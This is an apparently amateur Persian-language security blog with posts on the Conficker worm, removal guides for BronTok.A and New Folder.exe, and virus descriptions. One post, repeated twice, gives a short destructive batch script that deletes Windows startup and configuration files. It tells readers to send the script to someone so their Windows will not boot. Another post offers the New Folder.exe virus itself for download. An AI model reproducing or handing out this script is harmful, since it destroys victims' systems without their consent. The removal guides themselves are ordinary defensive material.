خطرناكترین كرم اینترنتی
كرم اینترنتی خطرناك Conflicker به تازگی به روز شده و نسخه C آن قادر به سوء استفاده از رایانه های شخصی برای ارسال هرزنامه و دیگر فعالیت های مخرب است. به گزارش فارس به نقل از سی آر ان، محققان می گویند كه نسخه تازه این كرم قادر به سرقت اطلاعات شخصی از رایانه های قربانی و تبدیل آن به دستگاه هایی است كه بدون اجازه كاربر هرزنامه ارسال كرده و دیگر بدافزارها را در فضای مجازی پخش می كنند.
تكنیك های به كار گرفته شده برای طراحی این كرم بسیار پیچیده و پیشرفته است و علیرغم تلاش فراوان برای شناسایی خالق كرم مذكور هنوز پیشرفتی در این زمینه حاصل نشده است.
این كرم كه تاكنون چند بار به روز شده و نسخه های جدید آن در اینترنت پخش شده به سرعت از طریق شبكه های P2P و سرویس های پست الكترونیك در حال آلوده كردن فضای اینترنت است.
+ نوشته شده در شنبه 12 اردیبهشت1388ساعت 4:33 بعد از ظهر توسط آقای مهندس داود
|
اینا رو تو نت پد تایپ کنید:
:c
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد فایل رو با پسوند bat. سیو کنید.
مثل این : nofooz.bat
این فایل رو وقتی برای کسی بفرستید هیچی نمیشه ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .
من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .
نظر یادتون نره
+ نوشته شده در دوشنبه 1 مهر1387ساعت 11:19 بعد از ظهر توسط آقای مهندس داود
|
اینا رو تو نت پد تایپ کنید:
:c
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد فایل رو با پسوند bat. سیو کنید.
مثل این : nofooz.bat
این فایل رو وقتی برای کسی بفرستید هیچی نمیشه ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .
من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .
نظر یادتون نره
+ نوشته شده در دوشنبه 1 مهر1387ساعت 10:57 بعد از ظهر توسط آقای مهندس داود
|
برای دانلود این ویروس کش به وبلاگ کاظم جووووون برید!!!!
سایت ویروس کش
+ نوشته شده در دوشنبه 31 تیر1387ساعت 5:29 بعد از ظهر توسط آقای مهندس داود
|
نام ويروس : Bckdr-QMG
نوع : تروجان
سيستم عامل هايي كه مي توانند توسط اين كد، آلوده شوند : سيستم هاي ويندوزي
تاريخ اولين گزارش : April 2008 (4.2
شناسايي توسط : همه محصولات Sophos
دستورالعمل پاك كردن این تروجان واسب تراوا :
1 . به روز كردن آنتي ويروس
2.روش پاك سازي دستي توسط آنتي ويروس سوفوس براي Windows NT مدل 4.5x و Windows NT/2000/XP/2003 مدل 4.1x و پايين تر :
براي حذف يك تروجان كارهاي زير را انجام دهيد :
1. همه ي برنامه هاي خود را ببنديد
2. مراحل Start|Programs| SophosAnti-Virus را بگذرانيد وبرنامه آنتي ويروس را اجرا كنيد
3. تب Immediate''''را انتخاب كنيد
4. به Options|Configuration رفته و تب ''''Disinfection'''' يا ''''Action'''' را انتخاب كرده سپس ''''Infected files'''' وبعد از آن ''''Delete'''' را انتخاب كنيد و در آخر ''''OK. را بزنيد
5. براي اجرا كردن پويش، ''scan'' يا دكمه ''''GO'''' را بزنيد
6. فايل هاي مورد نظر را پاك كنيد ، سپس يك پويش ديگر را اجرا كنيد تا مطمئن شويد پاك سازي صورت گرفته است
7. به Options|Configuration برگرديد و تب ''''Disinfection'''' يا ''''Action'''' انتخاب كرده سپس ''''Infected files'''' وبعد از آن ''''Delete'''' را انتخاب كنيد و در آخر ''''OK. را بزنيد
8. كامپيوتر را Reboot كرده و پويش نهايي را اجرا كنيد تا كاملا مطمئن شويد پاك ساري صورت گرفته است
+ نوشته شده در یکشنبه 30 تیر1387ساعت 2:57 بعد از ظهر توسط آقای مهندس داود
|
سلام... آره می دونم دیونت کرده ولی چاره چیه؟
شيوه ي پاک کردن ويروس BronTok.A .
اين ويروس نسبت به ويروس New Folder.exe خيلي حرفه اي تر نوشته شده ...
البته با Visual Basic 6.0 نوشتنش .
در زير به برخي از ويژگي هاي اين ويروس اشاره مي کنم :
1 . Folder Options را حذف مي کند !
2 . Registry Tools را قفل مي کند !
3 . Task Manager نمي تواند فايل هاي مربوط به اين ويروس را End کند !
4 . پس از اجرا شدن ، محتويات My Documents را نمايش مي دهد !
5 . اگر در کادر محاوره اي Run عبارت CMD ، Regedit ، msconfig ، Regedt32 را تايپ کنيد ، سيستم بلافاصله Restart مي شود !
6 . اگر روي گزينه ي Log Off يا Turn Off Computer کليک کنيد ، سيستم Restart مي شود !
7 . آيکون اين ويروس نيز مانند New Folder.exe شبيه آيکون يه پوشه س !
و ...
========================================================
همونطور که مي دونيد فايل هاي lsass.exe ، winlogon.exe و services.exe از فايل هاي سيستمي بوده و هميشه در حال اجرا هستند ...
اگر شما برنامه ي Process Master را اجرا کنيد ، مي بينيد که اين فايل ها در پوشه ي System32 قرار دارند .
اما اگر ويروس BronTok.A روي سيستم شما نصب باشد ، خواهيد ديد که سه تا فايل ديگه با همين نام ها در حال اجرا هستند !!
يعني دو تا winlogon.exe ، دو تا lsass.exe و دو تا services.exe !
اما به راحتي ميشه فهميد که کدوما ويروسن و کدوما فايل اصلي ويندوز ...
اون سه تا فايلي که مربوط به ويروس ميشن ، در پوشه اي غير از System32 قرار دارن .
مسير دقيقشون ميشه :
کد:
C:\Documents and Settings\MB_Danger\Local Settings\Application Data
C نام همان درايويست که ويندوز در آن نصب گرديده و MB_Danger نام کاربري است که ويروس در آن اجرا شده ...
بعد از اينکه با نرم افزار Process Master متوجه شديد که کدوما ويروسن ، بايد اون ها رو Kill process کنید .
اگر احیانا فایل های دیگری با نام های inetinfo.exe ، csrss.exe و smss.exe نیز در حال اجرا بودند آنها را هم Kill process کنید .
البته به شرطی که مسیرشون غیر از System32 باشه ...
حالا وقتشه که از نرم افزار Kill BronTok.A استفاده کنید .
پس از اینکه نرم افزار Kill BronTok.A کارش تموم شد ، اون رو ببندید و به منوی Start برید و روی گزینه ی Search کلیک کنید .
در سمت چپ روی گزینه ی All files and folders کلیک کنید .
در فیلد All or part of the file name عبارت Empty.pif را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
اکنون تمام فایل های پیدا شده را پاک کنید .
دوباره در فیلد مذکور عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
کد:
اکنون از بین فایل های پیدا شده ، هر فایلی که آیکونش شبیه آیکون پوشه بود رو پاک کنید .
مجددا در فیلد All or part of the file name عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
کد:
تمام فایل های پیدا شده را پاک کنید .
باز هم در فیلد فوق الذکر عبارت Bron را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
اکنون تمام فایل ها و پوشه های پیدا شده را پاک کنید .
اکنون با خیال راحت کامپیوترتان را Restart کنید .
نکته :
اگر ویندوزتان بیشتر از یک کاربر دارد ، باید تمام عملیات فوق را در همه ی کاربرها انجام دهید .
آموزش پاک کردن ويروس New Folder.exe
ژاحتمالا تا حالا با ویروس New Folder.exe مواجه شده اید !
قسمتی از مشخصات این ویروس به شرح زیر است :
1 . آیکون آن شبیه آیکون یک پوشه است .
2 . اندازه ی آن 140 کیلوبایته .
3 . پس از اجرای این ویروس ، محتویات پوشه ی My Documents نمایش داده می شود .
4 . این ویروس تولید مثل هم می کنه !
5 . گزینه ی Turn Off Computer رو از منوی Start حذف می کنه .
6 . از اجرای Registry Tools ، windows Task Manager و System Configuration Utility جلوگیری می کنه .
7 . پس از مدتی Registry Tools و Task Manager رو غیر فعال می کنه .
8 . ظاهرا توسط شخصی به نام علی صادقی نوشته شده ، چون وقتی داشتم کدهای اسمبلی این ویروس رو مشاهده می کردم با جمله ی زیر مواجه شدم :
i am ali sadeghi,master of you
چقدر هم مغرور !
9 . فکر کنم اسم اصلی این ویروس Mahsa باشه !
حالا این مهسا خانوم چه نسبتی با علی صادقی داره ، الله اعلم !
...
خلاصه به درخواست یکی از دوستان ، من نشستم و ضد این ویروس رو نوشتم که می تونید از لینک زیر دانلود کنید ...
دانلود Kill New Folder.exe
خود ویروس رو هم می تونید از پیوست دانلود کنید .
پس از اینکه برنامه ی Kill New Folder.exe کار خودش رو انجام داد ، باید مابقی ویروس ها رو خودتون به صورت دستی پاک کنید .
برای پاک کردن مابقی ویروس ها به شیوه ی زیر عمل کنید :
1 . به منوی Start بروید و روی گزینه ی Search کلیک کنید تا پنجره ی مربوطه نمایش داده شود .
2 . در سمت چپ روی گزینه ی All files and folders کلیک کنید .
3 . در قسمت All or part the file name عبارت New Folder.exe را تایپ کنید و روی گزینه ی Search کلیک نمایید .
حالا تمام فایل های پیدا شده رو پاک کنید .
حواستون باشه مجددا یکی از اونا رو اجرا نکنید .
منبع: پي 30 ورد دات كام
+ نوشته شده در شنبه 11 خرداد1387ساعت 3:30 بعد از ظهر توسط آقای مهندس داود
|
مشهورترین ویروس ها ر و میشناسی؟؟
نه؟؟؟!!
این یکیش :
ويروس Navidad
Navidad يك ويروس e-mail است كه برنامه Outlook محصول ميكروسافت را تحت تاثير قرار مي دهد. وقتي يك كاربر پيغامي را به كامپيوتري كه توسط اين ويروس آلوده شده است مي فرستد اين ويروس خود را در قالب پاسخ پيغام به فرد فرستنده ارسال مي نمايد. اگر پيوست NAVIDAD.EXE اجرا شود پيغامي به زبان اسپانيايي ظاهر مي شود. مفهوم پيغام اين است: «هرگز اين دكمه را فشار ندهيد.» اگر دكمه اي كه در پيغام گنجانده شده است فشرده شود پيغام ديگري با اين مفهوم ظاهر مي شود. «متاسفانه شما وسوسه شديد و حال كامپيوتر خود را از دست خواهيد داد.»
یقیه اش هم در ادامه مطلب...
ادامه مطلب+ نوشته شده در جمعه 13 مهر1386ساعت 2:33 بعد از ظهر توسط آقای مهندس داود
|
